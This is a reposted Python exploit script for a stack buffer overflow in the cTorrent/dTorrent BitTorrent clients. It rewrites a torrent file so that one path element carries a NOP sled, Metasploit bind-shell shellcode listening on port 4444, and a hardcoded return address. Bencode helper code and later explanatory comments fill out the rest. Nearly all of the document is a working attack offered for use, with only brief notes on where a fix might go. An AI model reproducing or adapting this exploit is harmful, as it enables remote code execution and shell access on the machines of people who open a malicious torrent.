cTorrent/DTorrent (.Torrent File) Buffer Overflow Exploit
来源:www.vfcocus.net 作者:Brooks 发布时间:2009-04-20  

#!/usr/bin/python

#Written By Michael Brooks
#04/17/2009

#Stack Based Buffer Overflow
#The vulnerability is in the btFiles::BuildFromMI function
#inside the btfiles.cpp file

#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386
#Can't get the exploit working on a modern linux kernel because of ASLR

#code is using python 2.5

#Home page for cTorrent 1.3.4:
#http://sourceforge.net/projects/ctorrent/  161,000+ Downloads
#dTorrent 3.3.2 is also vulnerable:
#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads

import sys
import os
#This code will take any torrent file and turn it into an exploit.
# Usage text printed when the input torrent cannot be read or the output written.
USAGE = "python exploit.py in_file.torrent out_file.torrent"

def main():
    """Command-line entry point: read argv[1], rewrite one path element, write argv[2].

    Only the first path component of the first entry under info.files is
    replaced, so the input must be a multi-file torrent; a single-file
    torrent (no "files" key) raises KeyError on that line, which sits
    outside both try blocks and is not caught.
    """
    #Start of the program
    bfile=fileio()
    try:
        bad_torrent=bfile.read_bencode(sys.argv[1])
    except:
        # NOTE(review): a bare except hides the real cause (missing file,
        # parse error) behind the usage text and also catches SystemExit
        # and KeyboardInterrupt.
        print USAGE
        sys.exit()
   
    exploit_str=create_exploit()
    print("Writing Bytes:"+str(len(exploit_str)))
    # The oversized string becomes info.files[0].path[0]; the header comment
    # places the overflow in btFiles::BuildFromMI (btfiles.cpp).
    bad_torrent["info"]["files"][0]["path"][0]=exploit_str
    try:
        bfile.write_bencode(sys.argv[2], bad_torrent)
    except:
        print USAGE
        sys.exit()

def create_exploit():
    """Return the oversized path string that overruns the stack buffer.

    Layout, as assembled by the author below: a NOP sled sized so that sled
    plus payload is 4028 bytes, 100 more filler bytes, the 4-byte value that
    replaces the saved return address, then a 4-byte pointer the parser
    writes through before returning. All addresses are fixed for the
    author's test system (see the header comment), which also notes the
    approach does not hold up under ASLR. NOTE(review): the defensive fix
    presumably belongs in BuildFromMI's handling of the path length
    (bounding the copy into the fixed-size buffer) -- not verifiable here.
    """
    # linux_ia32_bind -  LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com
    shellcode  = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
    shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24"
    shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d"
    shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad"
    shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17"
    shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26"
    shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce"
   
    #The exact address of our buffer is 0xbffffccc, which ebx tells us
    #however memory changes before we control the eip, 
    #so we change the addr to hit the NOP sled
    eip="\x11\xf1\xff\xbf"
    #eip="\xcc\xfc\xff\xbf"#the add ebx is holding
   
    #this is a dummy address to satisfy other pointer before we return
    #this cannot be the EIP because this location is written to!
    dumb_addr="\xcc\xfc\xff\xbf"
   
    #nop sled (sled + shellcode total 4028 bytes)
    long_str="\x90"*(4028-len(shellcode))
    #memory around the shellcode is written to,  but this is a safe place
    long_str+=shellcode
    #this 100byte buffer is written to before we control the eip
    long_str+="\x90"*100
    long_str+=eip#4128 bytes is the EIP!
   
    #This pointer must be real because it is written to in btFiles::BuildFromMI
    long_str+=dumb_addr#"this"
    #We can control these addresses but we don't need them
    #long_str+=dumb_addr#"metabuf"
    #long_str+=dumb_addr#"saveas"
    return long_str
       
#Start of functions for bencoding:
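class BTFailure(Exception):
    """Raised by bdecode() for malformed bencoded input.

    The original stub was a function that returned None, so
    ``raise BTFailure(msg)`` raised None (a TypeError) instead of a
    catchable error. An Exception subclass keeps the ``BTFailure(msg)``
    call form used by callers.
    """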

def decode_int(x, f):
    """Decode the bencoded integer starting at x[f] ('i<digits>e').

    Returns (value, index just past the closing 'e'). Raises ValueError for
    a leading zero other than the single digit "0" and for a negative zero;
    int() and str.index() raise ValueError for other malformed input.
    """
    start = f + 1                      # skip the leading 'i'
    end = x.index('e', start)
    value = int(x[start:end])
    first = x[start]
    if first == '-' and x[start + 1] == '0':
        raise ValueError
    if first == '0' and end != start + 1:
        raise ValueError
    return (value, end + 1)

def decode_string(x, f):
    """Decode the bencoded string at x[f] ('<len>:<payload>').

    Returns (payload, index just past the payload). Raises ValueError when
    the length has a leading zero other than the single digit "0".
    """
    sep = x.index(':', f)
    length = int(x[f:sep])
    if x[f] == '0' and sep != f + 1:
        raise ValueError
    payload_start = sep + 1
    payload_end = payload_start + length
    return (x[payload_start:payload_end], payload_end)

def decode_list(x, f):
    """Decode the bencoded list at x[f] ('l...e').

    Each element is dispatched through decode_func on its first character.
    Returns (items, index just past the closing 'e').
    """
    items = []
    pos = f + 1                        # skip the 'l'
    while x[pos] != 'e':
        item, pos = decode_func[x[pos]](x, pos)
        items.append(item)
    return (items, pos + 1)

def decode_dict(x, f):
    """Decode the bencoded dictionary at x[f] ('d...e').

    Keys are always decoded as strings; values are dispatched through
    decode_func on their first character. Returns (mapping, index just past
    the closing 'e'). Key order and duplicate keys are not validated.
    """
    result = {}
    pos = f + 1                        # skip the 'd'
    while x[pos] != 'e':
        key, pos = decode_string(x, pos)
        value, pos = decode_func[x[pos]](x, pos)
        result[key] = value
    return (result, pos + 1)

# Dispatch table: first character of a bencoded value -> decoder function.
# Strings are introduced by their decimal length, hence one entry per digit.
decode_func = {
    'l': decode_list,
    'd': decode_dict,
    'i': decode_int,
}
decode_func.update(dict.fromkeys("0123456789", decode_string))

def bdecode(x):
    """Decode one complete bencoded string into Python values.

    Raises BTFailure when the string is not valid bencode or when data
    remains after the first complete value.
    """
    try:
        value, consumed = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        raise BTFailure("not a valid bencoded string")
    if consumed == len(x):
        return value
    raise BTFailure("invalid bencoded value (data after valid prefix)")

from types import StringType, IntType, LongType, DictType, ListType, TupleType


class Bencached(object):
    """Wrapper for a value that is already bencoded.

    The encoder table emits ``bencoded`` verbatim instead of re-encoding.
    """

    __slots__ = ('bencoded',)

    def __init__(self, s):
        self.bencoded = s

def encode_bencached(x, r):
    """Append the pre-encoded text of a Bencached value to the output list r."""
    r += [x.bencoded]

def encode_int(x, r):
    """Append the bencoding of integer x ('i<decimal>e') to the output list r."""
    r += ['i', str(x), 'e']

def encode_bool(x, r):
    """Append a bool to r as the bencoded integer 1 or 0 (bencode has no bool)."""
    r.extend(('i', '1' if x else '0', 'e'))
       
def encode_string(x, r):
    """Append x as a bencoded string ('<len>:<payload>') to the output list r."""
    r += [str(len(x)), ':', x]

def encode_list(x, r):
    """Append the bencoding of a list or tuple ('l...e') to r.

    Every element is dispatched through encode_func by its exact type, so
    an unregistered type raises KeyError.
    """
    r.append('l')
    for element in x:
        encoder = encode_func[type(element)]
        encoder(element, r)
    r.append('e')

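def encode_dict(x, r):
    """Append the bencoding of dictionary x ('d...e') to the output list r.

    Keys are written in sorted order and are assumed to be plain strings
    (the length prefix is len(k)); values are dispatched through
    encode_func by their exact type.

    Fix: the original called ``.sort()`` on ``x.items()``, which only works
    where dict.items() returns a list (Python 2). ``sorted()`` yields the
    same order there and also works on dict views.
    """
    r.append('d')
    for key, value in sorted(x.items()):
        r.extend((str(len(key)), ':', key))
        encode_func[type(value)](value, r)
    r.append('e')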

# Dispatch table: exact Python type -> encoder for values of that type.
encode_func = {
    Bencached: encode_bencached,
    IntType: encode_int,
    LongType: encode_int,
    StringType: encode_string,
    ListType: encode_list,
    TupleType: encode_list,
    DictType: encode_dict,
}

# BooleanType is only registered where the types module provides it.
try:
    from types import BooleanType
except ImportError:
    pass
else:
    encode_func[BooleanType] = encode_bool

def bencode(x):
    """Return the bencoded string for x, dispatching on its exact type via encode_func."""
    parts = []
    encode_func[type(x)](x, parts)
    return ''.join(parts)

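class fileio:
    """Helpers that move a bencoded dictionary to and from disk."""

    def read_bencode(self, file):
        """Read the file at path ``file`` and return its bdecode()d value.

        Opened in binary mode to match write_bencode() and because bencoded
        data is not line-oriented text. Fix: the original opened in text
        mode and never closed the handle (``infile.close`` without the call
        parentheses); try/finally keeps this runnable on Python 2.5.
        """
        infile = open(file, "rb")
        try:
            raw = infile.read()
        finally:
            infile.close()
        return bdecode(raw)

    # writes a dictionary to a bencoded file
    def write_bencode(self, file, dict):
        """Bencode ``dict`` and write it to the path ``file`` in binary mode."""
        outfile = open(file, 'wb')
        try:
            outfile.write(bencode(dict))
        finally:
            outfile.close()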
   
#execute main
# Runs unconditionally at import time (no __main__ guard), so importing this
# module would also run the command-line flow.
main()


 